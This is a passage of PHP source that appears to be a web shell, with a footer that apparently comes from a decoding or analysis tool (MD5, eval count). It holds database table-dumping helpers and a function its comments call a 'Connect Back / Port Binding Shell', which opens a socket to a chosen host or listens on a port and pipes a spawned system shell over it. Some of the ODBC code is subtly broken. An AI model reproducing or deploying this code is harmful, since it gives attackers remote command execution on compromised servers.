	$query = "SELECT * FROM ".$mytable;
	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
	$dataout = "<table>\n";
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
		$dataout = $dataout . "<tr>\n";
		foreach($line as $colvalue) {
			$dataout = $dataout . "<td>$colvalue</td>\n";
		}
	$dataout = $dataout . "</tr>\n";
	}
	$dataout = $dataout . "</table>\n";
	return($dataout);
}

function Odisplay_tables($myhost, $myuser, $mypass) {
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	$result = odbc_tables($link);
	if (!$result) {
		return "DB Error, could not list tables";
	}
	$dataout = "<table>\n";
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
		if(odbc_result($line, 4) == "TABLE") {
			$dataout = $dataout . "<tr>\n";
			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n"; 
		}
		$dataout = $dataout . "</tr>\n";
	}
	$dataout = $dataout . "</table>\n";
	return($dataout);
}

######################################################################
# Dan's Network function Wrappers
# Initial use inside this script, need to handle the error data 
# differently to get it included in the base 64 output!
######################################################################

function DB_NET_GET_SOCKET_PROTOCOL($prot) {
	switch($prot) {
		case "udp":
			$protocol = SOL_UDP;
			$socktype = SOCK_DGRAM;
		break;
		case "tcp":
		default:
			$protocol = SOL_TCP;
			$socktype = SOCK_STREAM;
		break;
	}
	return(array($protocol, $socktype));
}

function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
	$address = gethostbyname($hostname);
	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
	switch($prot) {
		case "udp":
			$protocol = SOL_UDP;
			$socktype = SOCK_DGRAM;
		break;
		case "tcp":
		default:
			$protocol = SOL_TCP;
			$socktype = SOCK_STREAM;
		break;
	}
	$socket = socket_create(AF_INET, $socktype, $protocol);
	if ($socket < 0) {
		echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
	}

	$result = socket_connect($socket, $address, $port);
	if ($result < 0) {
		echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
	}
	return $socket;
}

function DB_NET_LISTEN($address, $port) {
	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
		echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
		return(-1);
	}

	if (($ret = socket_bind($sock, $address, $port)) < 0) {
		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
		return(-2);
	}

	if (($ret = socket_listen($sock, 5)) < 0) {
		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
		return(-3);
	}

	return($sock);
}

######################################################################
# Dan's PHP Connect Back / Port Binding Shell!
# Yes that right a REAL shell!
# Now I had this idea for ages, finally coded it 6 months ago, and 
# it's never really been used.
# Not really brain science but when there are many examples of PHP 
# sockets + proc_open it's a little harder.
######################################################################

function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
	if($type == "cb" && $host != "0.0.0.0") {
		$procsock = DB_NET_CONNECT($host, $port, "tcp");
	} elseif ($type == "pb") {
		$lsock = DB_NET_LISTEN($host, $port);
		if (($procsock = socket_accept($lsock)) < 0) {
    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
    	}
	} else {
		return "Error no connection details specified!";
	}

	set_time_limit(9000);
	$descriptorspec = array(
		0 => array("pipe", "r"),
		1 => array("pipe", "w"),
		2 => array("pipe", "w")
	);
	$process = proc_open($shell, $descriptorspec, $pipes);
	if (is_resource($process)) {
		$tmp_loop = 1;
		do {
			$tmp_array = array($procsock);
			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
			if ($num_changed_sockets === false) {
				$tmp_loop = 0;
			} else if ($num_changed_sockets > 0) {
				foreach($tmp_array as $k => $v) {
					if($v == $procsock) {
						if(socket_last_error($procsock) > 0) $tmp_loop = 0;
						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
						fwrite($pipes[0], $buf);
					}
				}
			}
			$tmp_arrayS = array($pipes[1], $pipes[2]);
			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
			if ($num_changed_streams === FALSE) {
				$tmp_loop = 0;
			} else if ($num_changed_streams > 0) {
				foreach($tmp_arrayS as $k => $v) {
					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
					socket_write($procsock, $buf, strlen($buf));
				}
			}
		} while($tmp_loop == 1);
	} else {
		return "Error executing shell " . $shell;
	}
}

?>

Function Calls

None

Variables

None

Stats

MD5 f44afbc866512877b80f46580dc16cfb
Eval Count 0
Decode Time 146 ms